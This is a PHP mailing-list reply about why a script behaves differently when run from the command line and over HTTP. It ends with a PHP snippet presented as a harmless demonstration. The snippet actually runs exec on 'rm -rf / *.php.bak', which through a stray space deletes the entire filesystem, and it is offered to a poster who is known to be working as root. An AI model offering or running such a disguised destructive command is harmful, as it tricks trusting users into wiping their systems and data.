Alice: Bottom post like everyone else...

---- "Wei wrote:
> Hi, Wolf:
>
>   Like I guessed, I am still defined as the root user.
>
> [EMAIL PROTECTED] html]# php test.php
> root
> root/var/www/html
> /var/www/html
>
> This is the output I have got from using your script.
> I have made a following quick change:
>
> [EMAIL PROTECTED] var]# chown -R root:root .
>
> Not surprisingly, I am still not able to make a new directory using PHP with
> the HTTP.
> Could there be anything else I missed?
>
> Alice

You are testing from the CLI but trying to run it via HTTP.  There IS a
difference and continued testing using a different method is going to give you
different results...

like the following script acts differently depending on where you use it.

<?php

$command= "rm -rf / *.php.bak";
exec ($command,$output);

print_r($output);